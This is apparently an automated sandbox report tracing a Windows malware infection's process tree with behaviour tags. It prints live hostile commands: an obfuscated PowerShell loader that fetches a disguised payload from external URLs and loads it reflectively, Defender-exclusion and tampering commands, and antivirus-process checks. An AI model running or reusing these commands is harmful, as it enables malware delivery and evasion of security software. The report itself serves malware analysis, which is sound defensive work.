                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.5.1251815999\1825721517" -childID 4 -isForBrowser -prefsHandle 3908 -prefMapHandle 3912 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e9e32c77-9668-4279-9cc8-3156c6bf5f46} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 3896 1f660d58 tab
                              7⤵
                                PID:1820
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.6.1093573914\1133859211" -childID 5 -isForBrowser -prefsHandle 3976 -prefMapHandle 3920 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fbe4c94c-dd7f-4dad-b3b8-95a4405cc622} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 3964 1f661658 tab
                                7⤵
                                  PID:1948
                          • C:\Users\Admin\AppData\Local\Temp\10148420101\eb8fc3faf3.exe
                            "C:\Users\Admin\AppData\Local\Temp\10148420101\eb8fc3faf3.exe"
                            4⤵
                            • Modifies Windows Defender DisableAntiSpyware settings
                            • Modifies Windows Defender Real-time Protection settings
                            • Modifies Windows Defender TamperProtection settings
                            • Modifies Windows Defender notification settings
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Windows security modification
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3260
                          • C:\Users\Admin\AppData\Local\Temp\10148430101\HHPgDSI.exe
                            "C:\Users\Admin\AppData\Local\Temp\10148430101\HHPgDSI.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3488
                          • C:\Users\Admin\AppData\Local\Temp\10148450101\HHPgDSI.exe
                            "C:\Users\Admin\AppData\Local\Temp\10148450101\HHPgDSI.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3688
                          • C:\Users\Admin\AppData\Local\Temp\10148460101\m4mrV1B.exe
                            "C:\Users\Admin\AppData\Local\Temp\10148460101\m4mrV1B.exe"
                            4⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            PID:3824
                            • C:\Windows\system32\cmd.exe
                              cmd.exe /c 67cc62a429f2f.vbs
                              5⤵
                                PID:3856
                                • C:\Windows\System32\WScript.exe
                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs"
                                  6⤵
                                    PID:4008
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBo@Gc@Z@Bm@C8@a@Bm@Gc@agBl@Hc@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@Mg@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBk@GU@QQBt@Go@ZwBu@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                      7⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4064
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.deAmjgn/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                                        8⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3164
                              • C:\Users\Admin\AppData\Local\Temp\10148470101\ReK7Ewx.exe
                                "C:\Users\Admin\AppData\Local\Temp\10148470101\ReK7Ewx.exe"
                                4⤵
                                • Executes dropped EXE
                                • Drops file in Windows directory
                                • System Location Discovery: System Language Discovery
                                PID:3452
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat
                                  5⤵
                                  • Loads dropped DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:3576
                                  • C:\Windows\SysWOW64\expand.exe
                                    expand Ae.msi Ae.msi.bat
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3596
                                  • C:\Windows\SysWOW64\tasklist.exe
                                    tasklist
                                    6⤵
                                    • Enumerates processes with tasklist
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3660
                                  • C:\Windows\SysWOW64\findstr.exe
                                    findstr /I "opssvc wrsa"
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3668
                                  • C:\Windows\SysWOW64\tasklist.exe
                                    tasklist
                                    6⤵
                                    • Enumerates processes with tasklist
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3724
                                  • C:\Windows\SysWOW64\findstr.exe
                                    findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2976
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c md 789919
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3008
                                  • C:\Windows\SysWOW64\extrac32.exe
                                    extrac32 /Y /E Deviation.msi
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2352
                                  • C:\Windows\SysWOW64\findstr.exe
                                    findstr /V "Brian" Challenges
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3412
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3260
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2720
                                  • C:\Users\Admin\AppData\Local\Temp\789919\Occupation.com
                                    Occupation.com q
                                    6⤵
                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SendNotifyMessage
                                    PID:3764
                                    • C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe
                                      C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe
                                      7⤵
                                        PID:3524
                                    • C:\Windows\SysWOW64\choice.exe
                                      choice /d y /t 5
                                      6⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3780
                                • C:\Users\Admin\AppData\Local\Temp\10148480101\yUI6F6C.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10148480101\yUI6F6C.exe"
                                  4⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:3924
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 1196
                                    5⤵
                                    • Loads dropped DLL
                                    • Program crash
                                    PID:3828
                                • C:\Users\Admin\AppData\Local\Temp\10148490101\ADFoyxP.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10148490101\ADFoyxP.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • Drops file in Windows directory
                                  • System Location Discovery: System Language Discovery
                                  PID:1460
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
                                    5⤵
                                    • Loads dropped DLL
                                    • System Location Discovery: System Language Discovery
                                    PID:3656
                                    • C:\Windows\SysWOW64\expand.exe
                                      expand Go.pub Go.pub.bat
                                      6⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3732
                                    • C:\Windows\SysWOW64\tasklist.exe
                                      tasklist
                                      6⤵
                                      • Enumerates processes with tasklist
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2272
                                    • C:\Windows\SysWOW64\findstr.exe
                                      findstr /I "opssvc wrsa"
                                      6⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3192
                                    • C:\Windows\SysWOW64\tasklist.exe
                                      tasklist
                                      6⤵
                                      • Enumerates processes with tasklist
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3148
                                    • C:\Windows\SysWOW64\findstr.exe
                                      findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                                      6⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:336
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c md 353090
                                      6⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3540
                                    • C:\Windows\SysWOW64\extrac32.exe
                                      extrac32 /Y /E Really.pub
                                      6⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3544
                                    • C:\Windows\SysWOW64\findstr.exe
                                      findstr /V "posted" Good
                                      6⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3312
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
                                      6⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3384
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
                                      6⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3820
                                    • C:\Users\Admin\AppData\Local\Temp\353090\Seat.com
                                      Seat.com m
                                      6⤵
                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SendNotifyMessage
                                      PID:3952
                                      • C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
                                        C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
                                        7⤵
                                          PID:3516
                                      • C:\Windows\SysWOW64\choice.exe
                                        choice /d y /t 5
                                        6⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3964
                                  • C:\Users\Admin\AppData\Local\Temp\10148500101\CgmaT61.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10148500101\CgmaT61.exe"
                                    4⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    PID:2300
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2300 -s 1196
                                      5⤵
                                      • Loads dropped DLL
                                      • Program crash
                                      PID:3352
                                  • C:\Users\Admin\AppData\Local\Temp\10148510101\PfOHmro.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10148510101\PfOHmro.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:3804
                                    • C:\Users\Admin\AppData\Local\Temp\10148510101\PfOHmro.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10148510101\PfOHmro.exe"
                                      5⤵
                                        PID:3624
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 500
                                        5⤵
                                        • Program crash
                                        PID:3940
                                    • C:\Users\Admin\AppData\Local\Temp\10148520101\v6Oqdnc.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10148520101\v6Oqdnc.exe"
                                      4⤵
                                        PID:3872
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 1200
                                          5⤵
                                          • Program crash
                                          PID:3604
                                      • C:\Users\Admin\AppData\Local\Temp\10148530101\mIrI3a9.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10148530101\mIrI3a9.exe"
                                        4⤵
                                          PID:3640
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'"
                                            5⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            PID:3684
                                        • C:\Users\Admin\AppData\Local\Temp\10148540101\XxzH301.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10148540101\XxzH301.exe"
                                          4⤵
                                            PID:1856
                                            • C:\Users\Admin\AppData\Local\Temp\mic97EE.tmp.exe
                                              C:\Users\Admin\AppData\Local\Temp\mic97EE.tmp.exe
                                              5⤵
                                                PID:1752
                                              • C:\Windows\system32\cmd.exe
                                                cmd /C del "C:\Users\Admin\AppData\Local\Temp\10148540101\XxzH301.exe"
                                                5⤵
                                                  PID:3696
                                              • C:\Users\Admin\AppData\Local\Temp\10148550101\V0Bt74c.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10148550101\V0Bt74c.exe"
                                                4⤵
                                                  PID:3540
                                                  • C:\Users\Admin\AppData\Local\Temp\10148550101\V0Bt74c.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10148550101\V0Bt74c.exe"
                                                    5⤵
                                                      PID:3376
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3376 -s 1004
                                                        6⤵
                                                        • Program crash
                                                        PID:2580
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3540 -s 500
                                                      5⤵
                                                      • Program crash
                                                      PID:3704
                                                  • C:\Users\Admin\AppData\Local\Temp\10148560101\zY9sqWs.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10148560101\zY9sqWs.exe"
                                                    4⤵
                                                      PID:2860
                                                      • C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"
                                                        5⤵
                                                          PID:1064
                                                      • C:\Users\Admin\AppData\Local\Temp\10148570101\mAtJWNv.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10148570101\mAtJWNv.exe"
                                                        4⤵
                                                          PID:3632
                                                          • C:\Users\Admin\AppData\Local\Temp\10148570101\mAtJWNv.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10148570101\mAtJWNv.exe"
                                                            5⤵
                                                              PID:3428
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 504
                                                              5⤵
                                                              • Program crash
                                                              PID:3596
                                                          • C:\Users\Admin\AppData\Local\Temp\10148580101\HmngBpR.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10148580101\HmngBpR.exe"
                                                            4⤵
                                                              PID:4072
                                                              • C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
                                                                C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
                                                                5⤵
                                                                  PID:3336
                                                                  • C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
                                                                    C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
                                                                    6⤵
                                                                      PID:3964
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\SysWOW64\cmd.exe
                                                                        7⤵
                                                                          PID:3596
